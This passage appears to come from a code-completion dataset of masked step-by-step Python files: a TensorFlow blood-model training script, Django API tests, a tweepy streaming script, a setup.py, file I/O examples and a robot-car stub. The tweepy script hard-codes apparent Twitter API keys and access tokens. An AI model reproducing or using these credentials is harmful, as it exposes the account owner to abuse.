tf.gfile.MakeDirs(FLAGS.checkpoint_dir)\n\n\ndef reload_checkpoint_if_exists(sess, saver, train_writer,\n validation_writer, test_writer):\n \"\"\"\n restore existing model from checkpoint data\n \"\"\"\n global_step = -1\n if FLAGS.continue_run:\n ckpt = tf.train.get_checkpoint_state(FLAGS.checkpoint_dir)\n if ckpt and ckpt.model_checkpoint_path:\n saver.restore(sess, ckpt.model_checkpoint_path)\n global_step = int(ckpt.model_checkpoint_path.split('/')[-1].\n split('-')[-1])\n print('checkpoint found at step %d', global_step)\n train_writer.add_session_log(tf.SessionLog(status=tf.SessionLog\n .START), global_step)\n validation_writer.add_session_log(tf.SessionLog(status=tf.\n SessionLog.START), global_step)\n test_writer.add_session_log(tf.SessionLog(status=tf.SessionLog.\n START), global_step)\n else:\n print('No checkpoint file found')\n return global_step\n\n\ndef main(argv=None):\n train()\n\n\nif __name__ == '__main__':\n tf.app.run()\n",
"step-4": "import tensorflow as tf\nimport blood_model\nimport os\nimport numpy as np\nFLAGS = tf.app.flags.FLAGS\nRUN = 'new_test_hm'\ntf.app.flags.DEFINE_string('checkpoint_dir', RUN + '/checkpoints',\n 'Directory where to write event logs and checkpoint.')\ntf.app.flags.DEFINE_string('summaries_dir', RUN + '/summaries',\n 'Summaries directory')\ntf.app.flags.DEFINE_string('max_steps', 20000,\n 'Maximum steps to train the model')\ntf.app.flags.DEFINE_string('continue_run', True,\n 'Continue from when training stopped?')\n\n\ndef train():\n \"\"\"Train blood_model for a number of steps. Periodically evaluate training and validation accuracies \"\"\"\n global_step = tf.Variable(0, name='global_step', trainable=False)\n blood_datasets = blood_model.inputs(eval_data=False)\n x, y_, data, keep_prob = blood_model.prepare_input()\n conv_output, _, _, _, _ = blood_model.inference(data, keep_prob)\n loss = blood_model.loss(conv_output, y_)\n accuracy = blood_model.accuracy(conv_output, y_)\n train_op = blood_model.train(loss, global_step)\n sess = tf.InteractiveSession()\n sess.run(tf.initialize_all_variables())\n summary_op = tf.merge_all_summaries()\n saver = tf.train.Saver()\n check_filesystem()\n train_writer = tf.train.SummaryWriter(FLAGS.summaries_dir + '/train',\n sess.graph)\n validation_writer = tf.train.SummaryWriter(FLAGS.summaries_dir +\n '/validation', sess.graph)\n test_writer = tf.train.SummaryWriter(FLAGS.summaries_dir + '/test',\n sess.graph)\n _ = reload_checkpoint_if_exists(sess, saver, train_writer,\n validation_writer, test_writer)\n for step in range(tf.train.global_step(sess, global_step) + 1, FLAGS.\n max_steps):\n batch = blood_datasets.train.next_batch()\n _, loss_output = sess.run([train_op, loss], feed_dict={x: batch[0],\n y_: batch[1], keep_prob: 0.5})\n assert not np.isnan(loss_output)\n if step % 100 == 0:\n summary, train_accuracy = sess.run([summary_op, accuracy],\n feed_dict={x: batch[0], y_: batch[1], keep_prob: 1.0})\n train_writer.add_summary(summary, step)\n print('step %d, training accuracy %g, loss %g' % (step,\n train_accuracy, loss_output))\n if (step % 1000 == 0 or step + 1 == FLAGS.max_steps) and not step == 0:\n batch = blood_datasets.validation.next_batch()\n summary_validation, accuracy_validation = sess.run([summary_op,\n accuracy], feed_dict={x: batch[0], y_: batch[1], keep_prob:\n 1.0})\n validation_writer.add_summary(summary_validation, step)\n print('validation accuracy %g' % accuracy_validation)\n checkpoint_path = os.path.join(FLAGS.checkpoint_dir, 'model.ckpt')\n saver.save(sess, checkpoint_path, global_step=step)\n print('saving checkpoint')\n\n\ndef check_filesystem():\n \"\"\"\n either start a new checkpoint or continue from existing checkpoint folder\n \"\"\"\n if FLAGS.continue_run:\n if not tf.gfile.Exists(FLAGS.summaries_dir):\n tf.gfile.MakeDirs(FLAGS.summaries_dir)\n tf.gfile.MakeDirs(os.path.join(FLAGS.summaries_dir, 'train'))\n tf.gfile.MakeDirs(os.path.join(FLAGS.summaries_dir, 'validation'))\n tf.gfile.MakeDirs(os.path.join(FLAGS.summaries_dir, 'test'))\n if not tf.gfile.Exists(FLAGS.checkpoint_dir):\n tf.gfile.MakeDirs(FLAGS.checkpoint_dir)\n else:\n if tf.gfile.Exists(FLAGS.summaries_dir):\n tf.gfile.DeleteRecursively(FLAGS.summaries_dir)\n tf.gfile.MakeDirs(FLAGS.summaries_dir)\n tf.gfile.MakeDirs(os.path.join(FLAGS.summaries_dir, 'train'))\n tf.gfile.MakeDirs(os.path.join(FLAGS.summaries_dir, 'validation'))\n tf.gfile.MakeDirs(os.path.join(FLAGS.summaries_dir, 'test'))\n if tf.gfile.Exists(FLAGS.checkpoint_dir):\n 
tf.gfile.DeleteRecursively(FLAGS.checkpoint_dir)\n tf.gfile.MakeDirs(FLAGS.checkpoint_dir)\n\n\ndef reload_checkpoint_if_exists(sess, saver, train_writer,\n validation_writer, test_writer):\n \"\"\"\n restore existing model from checkpoint data\n \"\"\"\n global_step = -1\n if FLAGS.continue_run:\n ckpt = tf.train.get_checkpoint_state(FLAGS.checkpoint_dir)\n if ckpt and ckpt.model_checkpoint_path:\n saver.restore(sess, ckpt.model_checkpoint_path)\n global_step = int(ckpt.model_checkpoint_path.split('/')[-1].\n split('-')[-1])\n print('checkpoint found at step %d', global_step)\n train_writer.add_session_log(tf.SessionLog(status=tf.SessionLog\n .START), global_step)\n validation_writer.add_session_log(tf.SessionLog(status=tf.\n SessionLog.START), global_step)\n test_writer.add_session_log(tf.SessionLog(status=tf.SessionLog.\n START), global_step)\n else:\n print('No checkpoint file found')\n return global_step\n\n\ndef main(argv=None):\n train()\n\n\nif __name__ == '__main__':\n tf.app.run()\n",
"step-5": "import tensorflow as tf\nimport blood_model\nimport os\nimport numpy as np\n\n\nFLAGS = tf.app.flags.FLAGS\nRUN = 'new_test_hm'\ntf.app.flags.DEFINE_string('checkpoint_dir', RUN+'/checkpoints',\n \"\"\"Directory where to write event logs and checkpoint.\"\"\")\ntf.app.flags.DEFINE_string('summaries_dir', RUN+'/summaries',\n \"\"\"Summaries directory\"\"\")\ntf.app.flags.DEFINE_string('max_steps', 20000,\n \"\"\"Maximum steps to train the model\"\"\")\ntf.app.flags.DEFINE_string('continue_run', True,\n \"\"\"Continue from when training stopped?\"\"\")\n\n\ndef train():\n \"\"\"Train blood_model for a number of steps. Periodically evaluate training and validation accuracies \"\"\"\n\n global_step = tf.Variable(0, name='global_step', trainable=False)\n\n # Get images and labels for blood_model.\n blood_datasets = blood_model.inputs(eval_data=False)\n\n # randomize the inputs look\n x, y_, data, keep_prob = blood_model.prepare_input()\n\n # build the convolution network\n conv_output, _, _, _, _ = blood_model.inference(data, keep_prob)\n # Calculate loss.\n loss = blood_model.loss(conv_output, y_)\n accuracy = blood_model.accuracy(conv_output, y_)\n\n train_op = blood_model.train(loss, global_step)\n\n sess = tf.InteractiveSession()\n\n sess.run(tf.initialize_all_variables())\n\n # Build the summary operation based on the TF collection of Summaries.\n summary_op = tf.merge_all_summaries()\n\n saver = tf.train.Saver()\n\n check_filesystem()\n\n train_writer = tf.train.SummaryWriter(FLAGS.summaries_dir + '/train', sess.graph)\n validation_writer = tf.train.SummaryWriter(FLAGS.summaries_dir + '/validation', sess.graph)\n test_writer = tf.train.SummaryWriter(FLAGS.summaries_dir + '/test', sess.graph)\n\n _ = reload_checkpoint_if_exists(sess, saver, train_writer, validation_writer, test_writer)\n for step in range(tf.train.global_step(sess, global_step)+1, FLAGS.max_steps):\n batch = blood_datasets.train.next_batch()\n _, loss_output = sess.run([train_op, loss], feed_dict={x: batch[0], y_: batch[1], keep_prob: 0.5})\n assert not np.isnan(loss_output)\n if step % 100 == 0:\n summary, train_accuracy = sess.run([summary_op, accuracy], feed_dict={\n x: batch[0], y_: batch[1], keep_prob: 1.0})\n train_writer.add_summary(summary, step)\n print(\"step %d, training accuracy %g, loss %g\" % (step, train_accuracy, loss_output))\n\n if (step % 1000 == 0 or (step + 1) == FLAGS.max_steps) and not step == 0:\n batch = blood_datasets.validation.next_batch()\n summary_validation, accuracy_validation = sess.run([summary_op, accuracy], feed_dict={\n x: batch[0], y_: batch[1], keep_prob: 1.0})\n validation_writer.add_summary(summary_validation, step)\n print(\"validation accuracy %g\" % accuracy_validation)\n\n # save checkpoint\n checkpoint_path = os.path.join(FLAGS.checkpoint_dir, 'model.ckpt')\n saver.save(sess, checkpoint_path, global_step=step)\n print(\"saving checkpoint\")\n\n\ndef check_filesystem():\n \"\"\"\n either start a new checkpoint or continue from existing checkpoint folder\n \"\"\"\n if FLAGS.continue_run:\n # start a new run, set flag to continue, so there is nothing\n # check if something there, if not, create, but don't delete\n if not tf.gfile.Exists(FLAGS.summaries_dir):\n tf.gfile.MakeDirs(FLAGS.summaries_dir)\n tf.gfile.MakeDirs(os.path.join(FLAGS.summaries_dir, 'train'))\n tf.gfile.MakeDirs(os.path.join(FLAGS.summaries_dir, 'validation'))\n tf.gfile.MakeDirs(os.path.join(FLAGS.summaries_dir, 'test'))\n if not tf.gfile.Exists(FLAGS.checkpoint_dir):\n 
tf.gfile.MakeDirs(FLAGS.checkpoint_dir)\n else:\n # delete checkpoints and event summaries because training restarted\n if tf.gfile.Exists(FLAGS.summaries_dir):\n tf.gfile.DeleteRecursively(FLAGS.summaries_dir)\n tf.gfile.MakeDirs(FLAGS.summaries_dir)\n tf.gfile.MakeDirs(os.path.join(FLAGS.summaries_dir, 'train'))\n tf.gfile.MakeDirs(os.path.join(FLAGS.summaries_dir, 'validation'))\n tf.gfile.MakeDirs(os.path.join(FLAGS.summaries_dir, 'test'))\n if tf.gfile.Exists(FLAGS.checkpoint_dir):\n tf.gfile.DeleteRecursively(FLAGS.checkpoint_dir)\n tf.gfile.MakeDirs(FLAGS.checkpoint_dir)\n\n\ndef reload_checkpoint_if_exists(sess, saver, train_writer, validation_writer, test_writer):\n \"\"\"\n restore existing model from checkpoint data\n \"\"\"\n global_step = -1\n if FLAGS.continue_run:\n ckpt = tf.train.get_checkpoint_state(FLAGS.checkpoint_dir)\n if ckpt and ckpt.model_checkpoint_path:\n # Restores from checkpoint\n saver.restore(sess, ckpt.model_checkpoint_path)\n # extract global_step from it.\n global_step = int(ckpt.model_checkpoint_path.split('/')[-1].split('-')[-1])\n print(\"checkpoint found at step %d\", global_step)\n # ensure that the writers ignore saved summaries that occurred after the last checkpoint but before a crash\n train_writer.add_session_log(tf.SessionLog(status=tf.SessionLog.START), global_step)\n validation_writer.add_session_log(tf.SessionLog(status=tf.SessionLog.START), global_step)\n test_writer.add_session_log(tf.SessionLog(status=tf.SessionLog.START), global_step)\n else:\n print('No checkpoint file found')\n return global_step\n\n\ndef main(argv=None):\n train()\n\nif __name__ == '__main__':\n tf.app.run()\n",
"step-ids": [
3,
5,
6,
7,
8
]
}
|
[
3,
5,
6,
7,
8
] |
import json
from django.core.management import call_command
from django.http import JsonResponse
from django.test import TestCase
from django.urls import reverse
URLS = ['api_v1:categories', 'api_v1:main_categories', 'api_v1:articles']
class GetJsonData(TestCase):
def test_post_not_login_no_pk(self):
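        # Anonymous GET requests to every list endpoint should still return a 200 JSON response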
for url in URLS:
response = self.client.get(reverse(url))
self.check_redirect(response)
def check_redirect(self, response):
self.assertEqual(response.status_code, 200)
self.assertEqual(type(response), JsonResponse)
class UnLoginGetArticleJsonTestCase(TestCase):
@classmethod
def setUpClass(cls):
super().setUpClass()
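        # Load the auth users and sample content fixtures once for the whole test case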
call_command('loaddata', 'fixtures/auth.json', verbosity=0)
call_command('loaddata', 'fixtures/dump.json', verbosity=0)
def test_article_success_data(self):
url = reverse('api_v1:articles')
self.response = self.client.get(url)
data = json.loads(self.response.content)
self.assertTrue(len(data) >= 1)
self.assertIn('pk', data[0])
self.assertIn('title', data[0])
self.assertIn('description', data[0])
self.assertIn('category_id', data[0])
self.assertIn('user_id', data[0])
self.assertIn('image', data[0])
def test_get_main_category_json_data(self):
url = reverse('api_v1:main_categories')
self.response = self.client.get(url)
data = json.loads(self.response.content)
self.assertTrue(len(data) >= 1)
self.assertIn('pk', data[0])
self.assertIn('title', data[0])
def test_get_json_category_success_data(self):
url = reverse('api_v1:categories')
self.response = self.client.get(url)
data = json.loads(self.response.content)
self.assertTrue(len(data) >= 1)
self.assertIn('pk', data[0])
self.assertIn('title', data[0])
self.assertIn('parent_id', data[0])
|
normal
|
{
"blob_id": "676caabb103f67c631bc191b11ab0d2d8ab25d1e",
"index": 5803,
"step-1": "<mask token>\n\n\nclass UnLoginGetArticleJsonTestCase(TestCase):\n\n @classmethod\n def setUpClass(cls):\n super().setUpClass()\n call_command('loaddata', 'fixtures/auth.json', verbosity=0)\n call_command('loaddata', 'fixtures/dump.json', verbosity=0)\n\n def test_article_success_data(self):\n url = reverse('api_v1:articles')\n self.response = self.client.get(url)\n data = json.loads(self.response.content)\n self.assertTrue(len(data) >= 1)\n self.assertIn('pk', data[0])\n self.assertIn('title', data[0])\n self.assertIn('description', data[0])\n self.assertIn('category_id', data[0])\n self.assertIn('user_id', data[0])\n self.assertIn('image', data[0])\n\n def test_get_main_category_json_data(self):\n url = reverse('api_v1:main_categories')\n self.response = self.client.get(url)\n data = json.loads(self.response.content)\n self.assertTrue(len(data) >= 1)\n self.assertIn('pk', data[0])\n self.assertIn('title', data[0])\n\n def test_get_json_category_success_data(self):\n url = reverse('api_v1:categories')\n self.response = self.client.get(url)\n data = json.loads(self.response.content)\n self.assertTrue(len(data) >= 1)\n self.assertIn('pk', data[0])\n self.assertIn('title', data[0])\n self.assertIn('parent_id', data[0])\n",
"step-2": "<mask token>\n\n\nclass GetJsonData(TestCase):\n <mask token>\n\n def check_redirect(self, response):\n self.assertEqual(response.status_code, 200)\n self.assertEqual(type(response), JsonResponse)\n\n\nclass UnLoginGetArticleJsonTestCase(TestCase):\n\n @classmethod\n def setUpClass(cls):\n super().setUpClass()\n call_command('loaddata', 'fixtures/auth.json', verbosity=0)\n call_command('loaddata', 'fixtures/dump.json', verbosity=0)\n\n def test_article_success_data(self):\n url = reverse('api_v1:articles')\n self.response = self.client.get(url)\n data = json.loads(self.response.content)\n self.assertTrue(len(data) >= 1)\n self.assertIn('pk', data[0])\n self.assertIn('title', data[0])\n self.assertIn('description', data[0])\n self.assertIn('category_id', data[0])\n self.assertIn('user_id', data[0])\n self.assertIn('image', data[0])\n\n def test_get_main_category_json_data(self):\n url = reverse('api_v1:main_categories')\n self.response = self.client.get(url)\n data = json.loads(self.response.content)\n self.assertTrue(len(data) >= 1)\n self.assertIn('pk', data[0])\n self.assertIn('title', data[0])\n\n def test_get_json_category_success_data(self):\n url = reverse('api_v1:categories')\n self.response = self.client.get(url)\n data = json.loads(self.response.content)\n self.assertTrue(len(data) >= 1)\n self.assertIn('pk', data[0])\n self.assertIn('title', data[0])\n self.assertIn('parent_id', data[0])\n",
"step-3": "<mask token>\n\n\nclass GetJsonData(TestCase):\n\n def test_post_not_login_no_pk(self):\n for url in URLS:\n response = self.client.get(reverse(url))\n self.check_redirect(response)\n\n def check_redirect(self, response):\n self.assertEqual(response.status_code, 200)\n self.assertEqual(type(response), JsonResponse)\n\n\nclass UnLoginGetArticleJsonTestCase(TestCase):\n\n @classmethod\n def setUpClass(cls):\n super().setUpClass()\n call_command('loaddata', 'fixtures/auth.json', verbosity=0)\n call_command('loaddata', 'fixtures/dump.json', verbosity=0)\n\n def test_article_success_data(self):\n url = reverse('api_v1:articles')\n self.response = self.client.get(url)\n data = json.loads(self.response.content)\n self.assertTrue(len(data) >= 1)\n self.assertIn('pk', data[0])\n self.assertIn('title', data[0])\n self.assertIn('description', data[0])\n self.assertIn('category_id', data[0])\n self.assertIn('user_id', data[0])\n self.assertIn('image', data[0])\n\n def test_get_main_category_json_data(self):\n url = reverse('api_v1:main_categories')\n self.response = self.client.get(url)\n data = json.loads(self.response.content)\n self.assertTrue(len(data) >= 1)\n self.assertIn('pk', data[0])\n self.assertIn('title', data[0])\n\n def test_get_json_category_success_data(self):\n url = reverse('api_v1:categories')\n self.response = self.client.get(url)\n data = json.loads(self.response.content)\n self.assertTrue(len(data) >= 1)\n self.assertIn('pk', data[0])\n self.assertIn('title', data[0])\n self.assertIn('parent_id', data[0])\n",
"step-4": "<mask token>\nURLS = ['api_v1:categories', 'api_v1:main_categories', 'api_v1:articles']\n\n\nclass GetJsonData(TestCase):\n\n def test_post_not_login_no_pk(self):\n for url in URLS:\n response = self.client.get(reverse(url))\n self.check_redirect(response)\n\n def check_redirect(self, response):\n self.assertEqual(response.status_code, 200)\n self.assertEqual(type(response), JsonResponse)\n\n\nclass UnLoginGetArticleJsonTestCase(TestCase):\n\n @classmethod\n def setUpClass(cls):\n super().setUpClass()\n call_command('loaddata', 'fixtures/auth.json', verbosity=0)\n call_command('loaddata', 'fixtures/dump.json', verbosity=0)\n\n def test_article_success_data(self):\n url = reverse('api_v1:articles')\n self.response = self.client.get(url)\n data = json.loads(self.response.content)\n self.assertTrue(len(data) >= 1)\n self.assertIn('pk', data[0])\n self.assertIn('title', data[0])\n self.assertIn('description', data[0])\n self.assertIn('category_id', data[0])\n self.assertIn('user_id', data[0])\n self.assertIn('image', data[0])\n\n def test_get_main_category_json_data(self):\n url = reverse('api_v1:main_categories')\n self.response = self.client.get(url)\n data = json.loads(self.response.content)\n self.assertTrue(len(data) >= 1)\n self.assertIn('pk', data[0])\n self.assertIn('title', data[0])\n\n def test_get_json_category_success_data(self):\n url = reverse('api_v1:categories')\n self.response = self.client.get(url)\n data = json.loads(self.response.content)\n self.assertTrue(len(data) >= 1)\n self.assertIn('pk', data[0])\n self.assertIn('title', data[0])\n self.assertIn('parent_id', data[0])\n",
"step-5": "import json\n\nfrom django.core.management import call_command\nfrom django.http import JsonResponse\nfrom django.test import TestCase\nfrom django.urls import reverse\n\n\nURLS = ['api_v1:categories', 'api_v1:main_categories', 'api_v1:articles']\n\n\nclass GetJsonData(TestCase):\n def test_post_not_login_no_pk(self):\n for url in URLS:\n response = self.client.get(reverse(url))\n self.check_redirect(response)\n\n def check_redirect(self, response):\n self.assertEqual(response.status_code, 200)\n self.assertEqual(type(response), JsonResponse)\n\n\nclass UnLoginGetArticleJsonTestCase(TestCase):\n @classmethod\n def setUpClass(cls):\n super().setUpClass()\n call_command('loaddata', 'fixtures/auth.json', verbosity=0)\n call_command('loaddata', 'fixtures/dump.json', verbosity=0)\n\n def test_article_success_data(self):\n url = reverse('api_v1:articles')\n self.response = self.client.get(url)\n data = json.loads(self.response.content)\n self.assertTrue(len(data) >= 1)\n self.assertIn('pk', data[0])\n self.assertIn('title', data[0])\n self.assertIn('description', data[0])\n self.assertIn('category_id', data[0])\n self.assertIn('user_id', data[0])\n self.assertIn('image', data[0])\n\n def test_get_main_category_json_data(self):\n url = reverse('api_v1:main_categories')\n self.response = self.client.get(url)\n data = json.loads(self.response.content)\n self.assertTrue(len(data) >= 1)\n self.assertIn('pk', data[0])\n self.assertIn('title', data[0])\n\n def test_get_json_category_success_data(self):\n url = reverse('api_v1:categories')\n self.response = self.client.get(url)\n data = json.loads(self.response.content)\n self.assertTrue(len(data) >= 1)\n self.assertIn('pk', data[0])\n self.assertIn('title', data[0])\n self.assertIn('parent_id', data[0])\n",
"step-ids": [
5,
7,
8,
9,
11
]
}
|
[
5,
7,
8,
9,
11
] |
from slistener import SListener
from slistener import track
import datetime
import time, tweepy, sys
import json
import re
#def tweet_collector():
consumer_key='qpUR91PwjvChszV0VFgrc4Hje'
consumer_secret='q9mPUZE2OsFbaqKUF32ZsY1ry4anZ1k8pNSne56wc3HInmERFu'
access_token='2845943577-R0g6YRlrdEqSFb2mKy5HXuByQPdpq4TLGrPkmSs'
access_token_secret='ed5emUSxHENLtqN8nLYvGkbipKAEemFd0fgjsXNPC8GED'
auth = tweepy.OAuthHandler(consumer_key, consumer_secret)
auth.set_access_token(access_token, access_token_secret)
api = tweepy.API(auth)
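# Hook the custom SListener into a tweepy Stream and filter on the track keywords imported from slistener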
listen = SListener(api)
stream = tweepy.Stream(auth, listen)
print "Streaming started..."
global track
try:
stream.filter(track = track)
except:
stream.disconnect()
|
normal
|
{
"blob_id": "606e40dd073c3efc95ef01a08466fd536a28f140",
"index": 324,
"step-1": "from slistener import SListener\nfrom slistener import track\nimport datetime\nimport time, tweepy, sys\nimport json\nimport re\n\n#def tweet_collector():\nconsumer_key='qpUR91PwjvChszV0VFgrc4Hje'\nconsumer_secret='q9mPUZE2OsFbaqKUF32ZsY1ry4anZ1k8pNSne56wc3HInmERFu'\naccess_token='2845943577-R0g6YRlrdEqSFb2mKy5HXuByQPdpq4TLGrPkmSs'\naccess_token_secret='ed5emUSxHENLtqN8nLYvGkbipKAEemFd0fgjsXNPC8GED'\nauth = tweepy.OAuthHandler(consumer_key, consumer_secret)\nauth.set_access_token(access_token, access_token_secret)\napi = tweepy.API(auth) \n\nlisten = SListener(api)\nstream = tweepy.Stream(auth, listen)\nprint \"Streaming started...\"\nglobal track \ntry:\n stream.filter(track = track)\nexcept:\n stream.disconnect()\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
from setuptools import setup
from os import path
this_directory = path.abspath(path.dirname(__file__))
with open(path.join(this_directory, 'README.md'), encoding='utf-8') as f:
long_description = f.read()
setup(
name='SumoSound',
packages=['SumoSound'],
version='1.0.2',
license='MIT',
description='A python library to add 3D sound to a Sumo traffic simulation.',
long_description=long_description,
long_description_content_type='text/markdown',
author='Patrick Malcolm',
author_email='[email protected]',
url='https://github.com/patmalcolm91/SumoSound',
download_url='https://github.com/patmalcolm91/SumoSound/archive/v_1.0.2.tar.gz',
keywords=['sumo', 'TraCI', 'sound', 'sound effects', '3D sound', 'OpenAL', 'traffic'],
install_requires=[
'pyopenal',
],
classifiers=[
'Development Status :: 5 - Production/Stable',
'Intended Audience :: Science/Research',
'Topic :: Scientific/Engineering',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8'
],
package_data={'SumoSound': ['stock_sounds/*.wav']}
)
|
normal
|
{
"blob_id": "81c9cabaa611f8e884708d535f0b99ff83ec1c0d",
"index": 8319,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nwith open(path.join(this_directory, 'README.md'), encoding='utf-8') as f:\n long_description = f.read()\nsetup(name='SumoSound', packages=['SumoSound'], version='1.0.2', license=\n 'MIT', description=\n 'A python library to add 3D sound to a Sumo traffic simulation.',\n long_description=long_description, long_description_content_type=\n 'text/markdown', author='Patrick Malcolm', author_email=\n '[email protected]', url=\n 'https://github.com/patmalcolm91/SumoSound', download_url=\n 'https://github.com/patmalcolm91/SumoSound/archive/v_1.0.2.tar.gz',\n keywords=['sumo', 'TraCI', 'sound', 'sound effects', '3D sound',\n 'OpenAL', 'traffic'], install_requires=['pyopenal'], classifiers=[\n 'Development Status :: 5 - Production/Stable',\n 'Intended Audience :: Science/Research',\n 'Topic :: Scientific/Engineering',\n 'License :: OSI Approved :: MIT License',\n 'Programming Language :: Python :: 3',\n 'Programming Language :: Python :: 3.4',\n 'Programming Language :: Python :: 3.5',\n 'Programming Language :: Python :: 3.6',\n 'Programming Language :: Python :: 3.7',\n 'Programming Language :: Python :: 3.8'], package_data={'SumoSound': [\n 'stock_sounds/*.wav']})\n",
"step-3": "<mask token>\nthis_directory = path.abspath(path.dirname(__file__))\nwith open(path.join(this_directory, 'README.md'), encoding='utf-8') as f:\n long_description = f.read()\nsetup(name='SumoSound', packages=['SumoSound'], version='1.0.2', license=\n 'MIT', description=\n 'A python library to add 3D sound to a Sumo traffic simulation.',\n long_description=long_description, long_description_content_type=\n 'text/markdown', author='Patrick Malcolm', author_email=\n '[email protected]', url=\n 'https://github.com/patmalcolm91/SumoSound', download_url=\n 'https://github.com/patmalcolm91/SumoSound/archive/v_1.0.2.tar.gz',\n keywords=['sumo', 'TraCI', 'sound', 'sound effects', '3D sound',\n 'OpenAL', 'traffic'], install_requires=['pyopenal'], classifiers=[\n 'Development Status :: 5 - Production/Stable',\n 'Intended Audience :: Science/Research',\n 'Topic :: Scientific/Engineering',\n 'License :: OSI Approved :: MIT License',\n 'Programming Language :: Python :: 3',\n 'Programming Language :: Python :: 3.4',\n 'Programming Language :: Python :: 3.5',\n 'Programming Language :: Python :: 3.6',\n 'Programming Language :: Python :: 3.7',\n 'Programming Language :: Python :: 3.8'], package_data={'SumoSound': [\n 'stock_sounds/*.wav']})\n",
"step-4": "from setuptools import setup\nfrom os import path\nthis_directory = path.abspath(path.dirname(__file__))\nwith open(path.join(this_directory, 'README.md'), encoding='utf-8') as f:\n long_description = f.read()\nsetup(name='SumoSound', packages=['SumoSound'], version='1.0.2', license=\n 'MIT', description=\n 'A python library to add 3D sound to a Sumo traffic simulation.',\n long_description=long_description, long_description_content_type=\n 'text/markdown', author='Patrick Malcolm', author_email=\n '[email protected]', url=\n 'https://github.com/patmalcolm91/SumoSound', download_url=\n 'https://github.com/patmalcolm91/SumoSound/archive/v_1.0.2.tar.gz',\n keywords=['sumo', 'TraCI', 'sound', 'sound effects', '3D sound',\n 'OpenAL', 'traffic'], install_requires=['pyopenal'], classifiers=[\n 'Development Status :: 5 - Production/Stable',\n 'Intended Audience :: Science/Research',\n 'Topic :: Scientific/Engineering',\n 'License :: OSI Approved :: MIT License',\n 'Programming Language :: Python :: 3',\n 'Programming Language :: Python :: 3.4',\n 'Programming Language :: Python :: 3.5',\n 'Programming Language :: Python :: 3.6',\n 'Programming Language :: Python :: 3.7',\n 'Programming Language :: Python :: 3.8'], package_data={'SumoSound': [\n 'stock_sounds/*.wav']})\n",
"step-5": "from setuptools import setup\nfrom os import path\n\nthis_directory = path.abspath(path.dirname(__file__))\nwith open(path.join(this_directory, 'README.md'), encoding='utf-8') as f:\n long_description = f.read()\n\nsetup(\n name='SumoSound',\n packages=['SumoSound'],\n version='1.0.2',\n license='MIT',\n description='A python library to add 3D sound to a Sumo traffic simulation.',\n long_description=long_description,\n long_description_content_type='text/markdown',\n author='Patrick Malcolm',\n author_email='[email protected]',\n url='https://github.com/patmalcolm91/SumoSound',\n download_url='https://github.com/patmalcolm91/SumoSound/archive/v_1.0.2.tar.gz',\n keywords=['sumo', 'TraCI', 'sound', 'sound effects', '3D sound', 'OpenAL', 'traffic'],\n install_requires=[\n 'pyopenal',\n ],\n classifiers=[\n 'Development Status :: 5 - Production/Stable',\n 'Intended Audience :: Science/Research',\n 'Topic :: Scientific/Engineering',\n 'License :: OSI Approved :: MIT License',\n 'Programming Language :: Python :: 3',\n 'Programming Language :: Python :: 3.4',\n 'Programming Language :: Python :: 3.5',\n 'Programming Language :: Python :: 3.6',\n 'Programming Language :: Python :: 3.7',\n 'Programming Language :: Python :: 3.8'\n ],\n package_data={'SumoSound': ['stock_sounds/*.wav']}\n)\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
#read file
my_file=open("file.txt","r")
#print(my_file.read())
#print(my_file.readline())
#print(my_file.read(3))#read 3 caracteres
"""
for line in my_file:
print(line)
my_file.close()
"""
print(my_file.readlines())#list
#close file
my_file.close()
#create new file and writing
new_file=open("newfile.txt",mode="w",encoding="utf-8")
for i in range (5) :
new_file.write("new line "+str(i+1)+"\n")
new_file.close()
#append
a=["new line 5\n","new line 6\n"]
new_file=open("newfile.txt",mode="a+",encoding="utf-8")
new_file.writelines(a)
new_file.close()
|
normal
|
{
"blob_id": "d44f8a2dee35d76c152695d49d73f74e9c25bfa9",
"index": 3015,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nprint(my_file.readlines())\nmy_file.close()\n<mask token>\nfor i in range(5):\n new_file.write('new line ' + str(i + 1) + '\\n')\nnew_file.close()\n<mask token>\nnew_file.writelines(a)\nnew_file.close()\n",
"step-3": "my_file = open('file.txt', 'r')\n<mask token>\nprint(my_file.readlines())\nmy_file.close()\nnew_file = open('newfile.txt', mode='w', encoding='utf-8')\nfor i in range(5):\n new_file.write('new line ' + str(i + 1) + '\\n')\nnew_file.close()\na = ['new line 5\\n', 'new line 6\\n']\nnew_file = open('newfile.txt', mode='a+', encoding='utf-8')\nnew_file.writelines(a)\nnew_file.close()\n",
"step-4": "#read file\nmy_file=open(\"file.txt\",\"r\")\n#print(my_file.read())\n#print(my_file.readline())\n#print(my_file.read(3))#read 3 caracteres\n\"\"\"\nfor line in my_file:\n print(line)\nmy_file.close()\n\"\"\"\nprint(my_file.readlines())#list\n#close file\nmy_file.close()\n\n#create new file and writing\nnew_file=open(\"newfile.txt\",mode=\"w\",encoding=\"utf-8\")\nfor i in range (5) :\n new_file.write(\"new line \"+str(i+1)+\"\\n\")\nnew_file.close()\n#append\na=[\"new line 5\\n\",\"new line 6\\n\"]\nnew_file=open(\"newfile.txt\",mode=\"a+\",encoding=\"utf-8\")\nnew_file.writelines(a)\nnew_file.close()\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
from robotcar import RobotCar
import pdb
class RobotCar_Stub(RobotCar):
def forward(self):
print("Forward")
def backward(self):
print("Backward")
def left(self):
print("Left")
def right(self):
print("Right")
def stop(self):
print("Stop")
if __name__ == '__main__':
rc = RobotCar_Stub()
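    # "fblrs" is presumably dispatched one character at a time by RobotCar.move to the methods above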
rc.move("fblrs")
|
normal
|
{
"blob_id": "09b2c1e69203f440754e82506b42e7856c94639a",
"index": 8623,
"step-1": "<mask token>\n\n\nclass RobotCar_Stub(RobotCar):\n <mask token>\n\n def backward(self):\n print('Backward')\n\n def left(self):\n print('Left')\n\n def right(self):\n print('Right')\n\n def stop(self):\n print('Stop')\n\n\n<mask token>\n",
